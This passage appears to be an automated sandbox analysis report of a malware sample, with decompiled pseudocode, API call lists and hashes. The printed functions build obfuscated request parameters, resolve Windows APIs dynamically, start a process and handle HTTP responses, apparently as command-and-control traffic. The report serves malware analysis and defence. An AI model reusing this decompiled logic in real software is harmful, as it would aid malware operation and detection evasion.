          									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
          									if( *((short*)(_t71 + 0x18)) != 0x10b) {
          										goto L59;
          									}
          									_t78 = _t76 - _t87;
          									__eflags =  *((short*)(_t71 + 6));
          									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
          									if( *((short*)(_t71 + 6)) <= 0) {
          										goto L59;
          									}
          									_t72 =  *((intOrPtr*)(_t89 + 0xc));
          									__eflags = _t78 - _t72;
          									if(_t78 < _t72) {
          										goto L46;
          									}
          									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
          									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
          										goto L46;
          									}
          									__eflags =  *(_t89 + 0x27) & 0x00000080;
          									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
          										goto L20;
          									}
          									goto L46;
          								}
          							} else {
          								goto L16;
          							}
          							while(1) {
          								L16:
          								__eflags =  *((intOrPtr*)(0x5ea388 + _t58 * 4)) - _t110;
          								if( *((intOrPtr*)(0x5ea388 + _t58 * 4)) == _t110) {
          									break;
          								}
          								_t58 = _t58 + 1;
          								__eflags = _t58 - _t81;
          								if(_t58 < _t81) {
          									continue;
          								}
          								goto L18;
          							}
          							__eflags = _t58;
          							if(_t58 <= 0) {
          								goto L5;
          							}
          							 *0x5ea3c8 = 1;
          							__eflags =  *0x5ea3c8;
          							if( *0x5ea3c8 != 0) {
          								goto L5;
          							}
          							__eflags =  *((intOrPtr*)(0x5ea388 + _t58 * 4)) - _t110;
          							if( *((intOrPtr*)(0x5ea388 + _t58 * 4)) == _t110) {
          								L32:
          								_t100 = 0;
          								__eflags = _t58;
          								if(_t58 < 0) {
          									L34:
          									 *0x5ea3c8 = 0;
          									goto L5;
          								} else {
          									goto L33;
          								}
          								do {
          									L33:
          									_t90 = 0x5ea388 + _t100 * 4;
          									_t100 = _t100 + 1;
          									__eflags = _t100 - _t58;
          									 *_t90 = _t110;
          									_t110 =  *_t90;
          								} while (_t100 <= _t58);
          								goto L34;
          							}
          							_t25 = _t81 - 1; // -1
          							_t58 = _t25;
          							__eflags = _t58;
          							if(_t58 < 0) {
          								L28:
          								__eflags = _t81 - 0x10;
          								if(_t81 < 0x10) {
          									_t81 = _t81 + 1;
          									__eflags = _t81;
          									 *0x5ea380 = _t81;
          								}
          								_t28 = _t81 - 1; // 0x0
          								_t58 = _t28;
          								goto L32;
          							} else {
          								goto L25;
          							}
          							while(1) {
          								L25:
          								__eflags =  *((intOrPtr*)(0x5ea388 + _t58 * 4)) - _t110;
          								if( *((intOrPtr*)(0x5ea388 + _t58 * 4)) == _t110) {
          									break;
          								}
          								_t58 = _t58 - 1;
          								__eflags = _t58;
          								if(_t58 >= 0) {
          									continue;
          								}
          								break;
          							}
          							__eflags = _t58;
          							if(__eflags >= 0) {
          								if(__eflags == 0) {
          									goto L34;
          								}
          								goto L32;
          							}
          							goto L28;
          						}
          						_t75 =  *((intOrPtr*)(_t108 - 8));
          						__eflags = _t75 - _v8;
          						if(_t75 < _v8) {
          							goto L20;
          						}
          						__eflags = _t75 - _t108;
          						if(_t75 >= _t108) {
          							goto L20;
          						}
          						goto L15;
          					}
          					L5:
          					_t63 = 1;
          					goto L60;
          				} else {
          					goto L3;
          				}
          			}

          APIs
          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 005E8602
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: MemoryQueryVirtual
          • String ID:
          • API String ID: 2850889275-0
          • Opcode ID: 073cd6ed5c84529ac8f2912e8aef8690bee3d0f8b1138c6425481cd60ab62373
          • Instruction ID: fedc93b7175571a25d6fdeb19c07d51f5d828a3b652117a043434ee3e7329f42
          • Opcode Fuzzy Hash: 073cd6ed5c84529ac8f2912e8aef8690bee3d0f8b1138c6425481cd60ab62373
          • Instruction Fuzzy Hash: 5761E4316006C29FDB2DCF2AC9807397BA1FBA5354B348869D4DECB291EF32EC459650
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 71%
          			E005E832C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
          				intOrPtr _v8;
          				char _v12;
          				void* __ebp;
          				signed int* _t43;
          				char _t44;
          				void* _t46;
          				void* _t49;
          				intOrPtr* _t53;
          				void* _t54;
          				void* _t65;
          				long _t66;
          				signed int* _t80;
          				signed int* _t82;
          				void* _t84;
          				signed int _t86;
          				void* _t89;
          				void* _t95;
          				void* _t96;
          				void* _t99;
          				void* _t106;
          
          				_t43 = _t84;
          				_t65 = __ebx + 2;
          				 *_t43 =  *_t43 ^ __edx ^  *__eax;
          				_t89 = _t95;
          				_t96 = _t95 - 8;
          				_push(_t65);
          				_push(_t84);
          				_push(_t89);
          				asm("cld");
          				_t66 = _a8;
          				_t44 = _a4;
          				if(( *(_t44 + 4) & 0x00000006) != 0) {
          					_push(_t89);
          					E005E8497(_t66 + 0x10, _t66, 0xffffffff);
          					_t46 = 1;
          				} else {
          					_v12 = _t44;
          					_v8 = _a12;
          					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
          					_t86 =  *(_t66 + 0xc);
          					_t80 =  *(_t66 + 8);
          					_t49 = E005E8551(_t66);
          					_t99 = _t96 + 4;
          					if(_t49 == 0) {
          						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
          						goto L11;
          					} else {
          						while(_t86 != 0xffffffff) {
          							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
          							if(_t53 == 0) {
          								L8:
          								_t80 =  *(_t66 + 8);
          								_t86 = _t80[_t86 + _t86 * 2];
          								continue;
          							} else {
          								_t54 =  *_t53();
          								_t89 = _t89;
          								_t86 = _t86;
          								_t66 = _a8;
          								_t55 = _t54;
          								_t106 = _t54;
          								if(_t106 == 0) {
          									goto L8;
          								} else {
          									if(_t106 < 0) {
          										_t46 = 0;
          									} else {
          										_t82 =  *(_t66 + 8);
          										E005E843C(_t55, _t66);
          										_t89 = _t66 + 0x10;
          										E005E8497(_t89, _t66, 0);
          										_t99 = _t99 + 0xc;
          										E005E8533(_t82[2]);
          										 *(_t66 + 0xc) =  *_t82;
          										_t66 = 0;
          										_t86 = 0;
          										 *(_t82[2])(1);
          										goto L8;
          									}
          								}
          							}
          							goto L13;
          						}
          						L11:
          						_t46 = 1;
          					}
          				}
          				L13:
          				return _t46;
          			}

          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
          • Instruction ID: 15d595eb5229c1eeaa46f7f2fffef7e02eacb6ae7a855becc9922b72e7e51946
          • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
          • Instruction Fuzzy Hash: 6A21F4329002459BCB18EF69CCC48BBBFA5FF48310B458568E8999B245EB30F915CBE0
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5c0000_server_(3).jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
          • Instruction ID: 3635990d3ec3bd694f5054effc51741b7f6de1521dd672cf8a96975be21f92d7
          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
          • Instruction Fuzzy Hash: 6C01A276A00604CFDF21DFA4C844FAB37E9FB86316F4544A9E90B972C2E774A941CB90
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 76%
          			E005E2B91(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
          				intOrPtr _v4;
          				signed int _v8;
          				int* _v12;
          				char* _v16;
          				intOrPtr _v20;
          				void* _v24;
          				intOrPtr _v32;
          				intOrPtr _v36;
          				void* _v40;
          				void* __ebx;
          				void* __edi;
          				long _t68;
          				intOrPtr _t69;
          				intOrPtr _t70;
          				intOrPtr _t71;
          				intOrPtr _t72;
          				intOrPtr _t73;
          				void* _t76;
          				intOrPtr _t77;
          				int _t80;
          				intOrPtr _t81;
          				intOrPtr _t85;
          				intOrPtr _t86;
          				intOrPtr _t87;
          				void* _t89;
          				void* _t92;
          				intOrPtr _t96;
          				intOrPtr _t100;
          				intOrPtr* _t102;
          				int* _t108;
          				int* _t118;
          				char** _t120;
          				char* _t121;
          				intOrPtr* _t126;
          				intOrPtr* _t128;
          				intOrPtr* _t130;
          				intOrPtr* _t132;
          				intOrPtr _t135;
          				intOrPtr _t139;
          				int _t142;
          				intOrPtr _t144;
          				int _t147;
          				intOrPtr _t148;
          				int _t151;
          				void* _t152;
          				intOrPtr _t166;
          				void* _t168;
          				int _t169;
          				void* _t170;
          				void* _t171;
          				long _t172;
          				intOrPtr* _t173;
          				intOrPtr* _t174;
          				intOrPtr _t175;
          				intOrPtr* _t178;
          				char** _t181;
          				char** _t183;
          				char** _t184;
          				void* _t189;
          
          				_t68 = __eax;
          				_t181 =  &_v16;
          				_t152 = _a20;
          				_a20 = 8;
          				if(__eax == 0) {
          					_t68 = GetTickCount();
          				}
          				_t69 =  *0x5ea018; // 0xc5e3c68d
          				asm("bswap eax");
          				_t70 =  *0x5ea014; // 0x3a87c8cd
          				asm("bswap eax");
          				_t71 =  *0x5ea010; // 0xd8d2f808
          				asm("bswap eax");
          				_t72 =  *0x5ea00c; // 0x81762942
          				asm("bswap eax");
          				_t73 =  *0x5ea348; // 0x25dd5a8
          				_t3 = _t73 + 0x5eb5ac; // 0x74666f73
          				_t169 = wsprintfA(_t152, _t3, 3, 0x3d18f, _t72, _t71, _t70, _t69,  *0x5ea02c,  *0x5ea004, _t68);
          				_t76 = E005E467F();
          				_t77 =  *0x5ea348; // 0x25dd5a8
          				_t4 = _t77 + 0x5eb575; // 0x74707526
          				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
          				_t183 =  &(_t181[0xe]);
          				_t170 = _t169 + _t80;
          				if(_a24 != 0) {
          					_t148 =  *0x5ea348; // 0x25dd5a8
          					_t8 = _t148 + 0x5eb508; // 0x732526
          					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
          					_t183 =  &(_t183[3]);
          					_t170 = _t170 + _t151;
          				}
          				_t81 =  *0x5ea348; // 0x25dd5a8
          				_t10 = _t81 + 0x5eb89e; // 0x2bc8e46
          				_t153 = _t10;
          				_t189 = _a20 - _t10;
          				_t12 = _t81 + 0x5eb246; // 0x74636126
          				_t164 = 0 | _t189 == 0x00000000;
          				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
          				_t85 =  *0x5ea36c; // 0x2bc95b0
          				_t184 =  &(_t183[3]);
          				if(_t85 != 0) {
          					_t144 =  *0x5ea348; // 0x25dd5a8
          					_t16 = _t144 + 0x5eb8be; // 0x3d736f26
          					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
          					_t184 =  &(_t184[3]);
          					_t171 = _t171 + _t147;
          				}
          				_t86 = E005E472F(_t153);
          				_a32 = _t86;
          				if(_t86 != 0) {
          					_t139 =  *0x5ea348; // 0x25dd5a8
          					_t19 = _t139 + 0x5eb8d0; // 0x736e6426
          					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
          					_t184 =  &(_t184[3]);
          					_t171 = _t171 + _t142;
          					HeapFree( *0x5ea2d8, 0, _a40);
          				}
          				_t87 = E005E1340();
          				_a32 = _t87;
          				if(_t87 != 0) {
          					_t135 =  *0x5ea348; // 0x25dd5a8
          					_t23 = _t135 + 0x5eb8c5; // 0x6f687726
          					wsprintfA(_t171 + _t152, _t23, _t87);
          					_t184 =  &(_t184[3]);
          					HeapFree( *0x5ea2d8, 0, _a40);
          				}
          				_t166 =  *0x5ea3cc; // 0x2bc9600
          				_t89 = E005E6B59(0x5ea00a, _t166 + 4);
          				_t172 = 0;
          				_a16 = _t89;
          				if(_t89 == 0) {
          					L30:
          					HeapFree( *0x5ea2d8, _t172, _t152);
          					return _a44;
          				} else {
          					_t92 = RtlAllocateHeap( *0x5ea2d8, 0, 0x800);
          					_a24 = _t92;
          					if(_t92 == 0) {
          						L29:
          						HeapFree( *0x5ea2d8, _t172, _a8);
          						goto L30;
          					}
          					E005E2915(GetTickCount());
          					_t96 =  *0x5ea3cc; // 0x2bc9600
          					__imp__(_t96 + 0x40);
          					asm("lock xadd [eax], ecx");
          					_t100 =  *0x5ea3cc; // 0x2bc9600
          					__imp__(_t100 + 0x40);
          					_t102 =  *0x5ea3cc; // 0x2bc9600
          					_t168 = E005E6675(1, _t164, _t152,  *_t102);
          					asm("lock xadd [eax], ecx");
          					if(_t168 == 0) {
          						L28:
          						HeapFree( *0x5ea2d8, _t172, _a16);
          						goto L29;
          					}
          					StrTrimA(_t168, 0x5e9280);
          					_push(_t168);
          					_t108 = E005E7563();
          					_v12 = _t108;
          					if(_t108 == 0) {
          						L27:
          						HeapFree( *0x5ea2d8, _t172, _t168);
          						goto L28;
          					}
          					_t173 = __imp__;
          					 *_t173(_t168, _a8);
          					 *_t173(_a4, _v12);
          					_t174 = __imp__;
          					 *_t174(_v4, _v24);
          					_t175 = E005E6536( *_t174(_v12, _t168), _v20);
          					_v36 = _t175;
          					if(_t175 == 0) {
          						_v8 = 8;
          						L25:
          						E005E63F6();
          						L26:
          						HeapFree( *0x5ea2d8, 0, _v40);
          						_t172 = 0;
          						goto L27;
          					}
          					_t118 = E005E6F7D(_t152, 0xffffffffffffffff, _t168,  &_v24);
          					_v12 = _t118;
          					if(_t118 == 0) {
          						_t178 = _v24;
          						_v20 = E005E597D(_t178, _t175, _v16, _v12);
          						_t126 =  *((intOrPtr*)(_t178 + 8));
          						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
          						_t128 =  *((intOrPtr*)(_t178 + 8));
          						 *((intOrPtr*)( *_t128 + 8))(_t128);
          						_t130 =  *((intOrPtr*)(_t178 + 4));
          						 *((intOrPtr*)( *_t130 + 8))(_t130);
          						_t132 =  *_t178;
          						 *((intOrPtr*)( *_t132 + 8))(_t132);
          						E005E61DA(_t178);
          					}
          					if(_v8 != 0x10d2) {
          						L20:
          						if(_v8 == 0) {
          							_t120 = _v16;
          							if(_t120 != 0) {
          								_t121 =  *_t120;
          								_t176 =  *_v12;
          								_v16 = _t121;
          								wcstombs(_t121, _t121,  *_v12);
          								 *_v24 = E005E673A(_v16, _v16, _t176 >> 1);
          							}
          						}
          						goto L23;
          					} else {
          						if(_v16 != 0) {
          							L23:
          							E005E61DA(_v32);
          							if(_v12 == 0 || _v8 == 0x10d2) {
          								goto L26;
          							} else {
          								goto L25;
          							}
          						}
          						_v8 = _v8 & 0x00000000;
          						goto L20;
          					}
          				}
          			}

          APIs
          • GetTickCount.KERNEL32 ref: 005E2BA8
          • wsprintfA.USER32 ref: 005E2BF5
          • wsprintfA.USER32 ref: 005E2C12
          • wsprintfA.USER32 ref: 005E2C34
          • wsprintfA.USER32 ref: 005E2C5B
          • wsprintfA.USER32 ref: 005E2C7C
          • wsprintfA.USER32 ref: 005E2CA7
          • HeapFree.KERNEL32(00000000,?), ref: 005E2CBA
          • wsprintfA.USER32 ref: 005E2CD9
          • HeapFree.KERNEL32(00000000,?), ref: 005E2CEA
            • Part of subcall function 005E6B59: RtlEnterCriticalSection.NTDLL(02BC95C0), ref: 005E6B75
            • Part of subcall function 005E6B59: RtlLeaveCriticalSection.NTDLL(02BC95C0), ref: 005E6B93
          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 005E2D19
          • GetTickCount.KERNEL32 ref: 005E2D2B
          • RtlEnterCriticalSection.NTDLL(02BC95C0), ref: 005E2D3F
          • RtlLeaveCriticalSection.NTDLL(02BC95C0), ref: 005E2D5D
            • Part of subcall function 005E6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E66A0
            • Part of subcall function 005E6675: lstrlen.KERNEL32(00000000,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E66A8
            • Part of subcall function 005E6675: strcpy.NTDLL ref: 005E66BF
            • Part of subcall function 005E6675: lstrcat.KERNEL32(00000000,00000000), ref: 005E66CA
            • Part of subcall function 005E6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,005E3ECE,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E66E7
          • StrTrimA.SHLWAPI(00000000,005E9280,?,02BC9600), ref: 005E2D8F
            • Part of subcall function 005E7563: lstrlen.KERNEL32(02BC9C10,00000000,00000000,00000000,005E3EF9,00000000), ref: 005E7573
            • Part of subcall function 005E7563: lstrlen.KERNEL32(?), ref: 005E757B
            • Part of subcall function 005E7563: lstrcpy.KERNEL32(00000000,02BC9C10), ref: 005E758F
            • Part of subcall function 005E7563: lstrcat.KERNEL32(00000000,?), ref: 005E759A
          • lstrcpy.KERNEL32(00000000,?), ref: 005E2DB2
          • lstrcpy.KERNEL32(?,?), ref: 005E2DBC
          • lstrcat.KERNEL32(?,?), ref: 005E2DCC
          • lstrcat.KERNEL32(?,00000000), ref: 005E2DD3
            • Part of subcall function 005E6536: lstrlen.KERNEL32(?,00000000,02BC9E18,00000000,005E6F0A,02BCA03B,43175AC3,?,?,?,?,43175AC3,00000005,005EA00C,4D283A53,?), ref: 005E653D
            • Part of subcall function 005E6536: mbstowcs.NTDLL ref: 005E6566
            • Part of subcall function 005E6536: memset.NTDLL ref: 005E6578
          • wcstombs.NTDLL ref: 005E2E76
            • Part of subcall function 005E597D: SysAllocString.OLEAUT32(?), ref: 005E59B8
            • Part of subcall function 005E61DA: RtlFreeHeap.NTDLL(00000000,00000000,005E6383,00000000,?,00000000,00000000), ref: 005E61E6
          • HeapFree.KERNEL32(00000000,?), ref: 005E2EBF
          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 005E2ECB
          • HeapFree.KERNEL32(00000000,?,?,02BC9600), ref: 005E2ED8
          • HeapFree.KERNEL32(00000000,?), ref: 005E2EE5
          • HeapFree.KERNEL32(00000000,?), ref: 005E2EEF
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
          • String ID: Uqt
          • API String ID: 1185349883-2320327147
          • Opcode ID: b0f201cd5090e54d3b3bc8d59a18c7a4e9d9db25ac143981bb268307c5c2ec4d
          • Instruction ID: c2885c780b4167474f65f9d69ba4593d54c756ca47ea832f5a77db7fc3a5d8b7
          • Opcode Fuzzy Hash: b0f201cd5090e54d3b3bc8d59a18c7a4e9d9db25ac143981bb268307c5c2ec4d
          • Instruction Fuzzy Hash: E1A18A71500291AFC719DF66DC88E6A7BE8FF98354F050928F4C8DB221D731E849EB62
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 73%
          			E005E37DF(void* __eax, void* __ecx) {
          				long _v8;
          				char _v12;
          				void* _v16;
          				void* _v28;
          				long _v32;
          				void _v104;
          				char _v108;
          				long _t36;
          				intOrPtr _t40;
          				intOrPtr _t47;
          				intOrPtr _t50;
          				void* _t58;
          				void* _t68;
          				intOrPtr* _t70;
          				intOrPtr* _t71;
          
          				_t1 = __eax + 0x14; // 0x74183966
          				_t69 =  *_t1;
          				_t36 = E005E6BF9(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
          				_v8 = _t36;
          				if(_t36 != 0) {
          					L12:
          					return _v8;
          				}
          				E005E7AB0( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
          				_t40 = _v12(_v12);
          				_v8 = _t40;
          				if(_t40 == 0 && ( *0x5ea300 & 0x00000001) != 0) {
          					_v32 = 0;
          					asm("stosd");
          					asm("stosd");
          					asm("stosd");
          					_v108 = 0;
          					memset( &_v104, 0, 0x40);
          					_t47 =  *0x5ea348; // 0x25dd5a8
          					_t18 = _t47 + 0x5eb706; // 0x73797325
          					_t68 = E005E127E(_t18);
          					if(_t68 == 0) {
          						_v8 = 8;
          					} else {
          						_t50 =  *0x5ea348; // 0x25dd5a8
          						_t19 = _t50 + 0x5eb86c; // 0x2bc8e14
          						_t20 = _t50 + 0x5eb3f6; // 0x4e52454b
          						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
          						if(_t71 == 0) {
          							_v8 = 0x7f;
          						} else {
          							_v108 = 0x44;
          							E005E5B56();
          							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
          							_push(1);
          							E005E5B56();
          							if(_t58 == 0) {
          								_v8 = GetLastError();
          							} else {
          								CloseHandle(_v28);
          								CloseHandle(_v32);
          							}
          						}
          						HeapFree( *0x5ea2d8, 0, _t68);
          					}
          				}
          				_t70 = _v16;
          				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
          				E005E61DA(_t70);
          				goto L12;
          			}

          0x005e37e7
          0x005e37e7
          0x005e37f6
          0x005e37fd
          0x005e3802
          0x005e390f
          0x005e3916
          0x005e3916
          0x005e3811
          0x005e3819
          0x005e381c
          0x005e3821
          0x005e3836
          0x005e383c
          0x005e383d
          0x005e3840
          0x005e3846
          0x005e3849
          0x005e384e
          0x005e3856
          0x005e3862
          0x005e3866
          0x005e38f6
          0x005e386c
          0x005e386c
          0x005e3871
          0x005e3878
          0x005e388c
          0x005e3890
          0x005e38df
          0x005e3892
          0x005e3893
          0x005e389a
          0x005e38b3
          0x005e38b5
          0x005e38b9
          0x005e38c0
          0x005e38da
          0x005e38c2
          0x005e38cb
          0x005e38d0
          0x005e38d0
          0x005e38c0
          0x005e38ee
          0x005e38ee
          0x005e3866
          0x005e38fd
          0x005e3906
          0x005e390a
          0x00000000

          APIs
            • Part of subcall function 005E6BF9: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,005E37FB,?,?,?,?,00000000,00000000), ref: 005E6C1E
            • Part of subcall function 005E6BF9: GetProcAddress.KERNEL32(00000000,7243775A), ref: 005E6C40
            • Part of subcall function 005E6BF9: GetProcAddress.KERNEL32(00000000,614D775A), ref: 005E6C56
            • Part of subcall function 005E6BF9: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 005E6C6C
            • Part of subcall function 005E6BF9: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 005E6C82
            • Part of subcall function 005E6BF9: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 005E6C98
          • memset.NTDLL ref: 005E3849
            • Part of subcall function 005E127E: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,005E3862,73797325), ref: 005E128F
            • Part of subcall function 005E127E: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 005E12A9
          • GetModuleHandleA.KERNEL32(4E52454B,02BC8E14,73797325), ref: 005E387F
          • GetProcAddress.KERNEL32(00000000), ref: 005E3886
          • HeapFree.KERNEL32(00000000,00000000), ref: 005E38EE
            • Part of subcall function 005E5B56: GetProcAddress.KERNEL32(36776F57,005E2425), ref: 005E5B71
          • CloseHandle.KERNEL32(00000000,00000001), ref: 005E38CB
          • CloseHandle.KERNEL32(?), ref: 005E38D0
          • GetLastError.KERNEL32(00000001), ref: 005E38D4
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
          • String ID: Uqt$@MqtNqt
          • API String ID: 3075724336-3266969629
          • Opcode ID: 03d2803409345d3a120b04b83843f346f8c9b5bbd1f9feb0f9cb1af98968f5a0
          • Instruction ID: 6ddd433ade9b7f5e9353c570e33c3bd8667c74c279450689c1771caebbff71c8
          • Opcode Fuzzy Hash: 03d2803409345d3a120b04b83843f346f8c9b5bbd1f9feb0f9cb1af98968f5a0
          • Instruction Fuzzy Hash: 5E3172B1804299AFDB14AFA6CC8DD9EBFBCFB48344F004465F685A7121D7306E48DB50
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E005E3FA5(void* __ecx, void* __esi) {
          				long _v8;
          				long _v12;
          				long _v16;
          				long _v20;
          				long _t34;
          				long _t39;
          				long _t42;
          				long _t56;
          				void* _t58;
          				void* _t59;
          				void* _t61;
          
          				_t61 = __esi;
          				_t59 = __ecx;
          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
          				do {
          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
          					_v20 = _t34;
          					if(_t34 != 0) {
          						L3:
          						_v8 = 4;
          						_v16 = 0;
          						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
          							_t39 = GetLastError();
          							_v12 = _t39;
          							if(_v20 == 0 || _t39 != 0x2ef3) {
          								L15:
          								return _v12;
          							} else {
          								goto L11;
          							}
          						}
          						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
          							goto L11;
          						} else {
          							_v16 = 0;
          							_v8 = 0;
          							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
          							_t58 = E005E33DC(_v8 + 1);
          							if(_t58 == 0) {
          								_v12 = 8;
          							} else {
          								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
          									E005E61DA(_t58);
          									_v12 = GetLastError();
          								} else {
          									 *((char*)(_t58 + _v8)) = 0;
          									 *(_t61 + 0xc) = _t58;
          								}
          							}
          							goto L15;
          						}
          					}
          					SetEvent( *(_t61 + 0x1c));
          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
          					_v12 = _t56;
          					if(_t56 != 0) {
          						goto L15;
          					}
          					goto L3;
          					L11:
          					_t42 = E005E16B2( *(_t61 + 0x1c), _t59, 0xea60);
          					_v12 = _t42;
          				} while (_t42 == 0);
          				goto L15;
          			}
          0x005e3fa5
          0x005e3fa5
          0x005e3fb5
          0x005e3fb8
          0x005e3fbc
          0x005e3fc2
          0x005e3fc7
          0x005e3fe0
          0x005e3ff4
          0x005e3ffb
          0x005e4002
          0x005e4055
          0x005e405b
          0x005e4061
          0x005e409c
          0x005e40a2
          0x00000000
          0x00000000
          0x00000000
          0x005e4061
          0x005e4008
          0x00000000
          0x005e400f
          0x005e401d
          0x005e4020
          0x005e4023
          0x005e402f
          0x005e4033
          0x005e4095
          0x005e4035
          0x005e4047
          0x005e4085
          0x005e4090
          0x005e4049
          0x005e404c
          0x005e4050
          0x005e4050
          0x005e4047
          0x00000000
          0x005e4033
          0x005e4008
          0x005e3fcc
          0x005e3fd2
          0x005e3fd5
          0x005e3fda
          0x00000000
          0x00000000
          0x00000000
          0x005e406a
          0x005e4072
          0x005e4077
          0x005e407a
          0x00000000

          APIs
          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,747581D0,00000000,00000000), ref: 005E3FBC
